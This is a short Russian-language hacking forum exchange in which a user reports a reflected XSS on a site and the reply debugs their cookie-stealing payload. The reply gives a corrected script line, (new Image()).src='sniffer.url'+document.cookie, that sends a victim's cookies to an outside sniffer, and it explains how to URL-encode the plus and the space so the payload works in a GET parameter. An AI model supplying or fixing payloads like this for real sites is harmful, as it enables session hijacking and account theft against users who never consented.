07.05.2015, 14:53
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от Unknowhacker
↑
Есть пассивная XSS, читаем куки ">alert(document.cookie) - без вопросов, но когда я подставляю сниффер - куки не приходят.
http://site.ru/?=
">(new+image()).src="sniffer.url"document.cookieу же ажрес сниффер через ЧарКод пропускал - нефига ..
нефига, потому что синтаксис кривой: (new image()).src="sniffer.url" +document.cookie
там должен быть реальный плюс, если это гет параметр, то нужно его заурленкодить, то есть %2b. а между new Image (Image с большой буквы) должен быть реальный пробел, то есть %20
|
|
|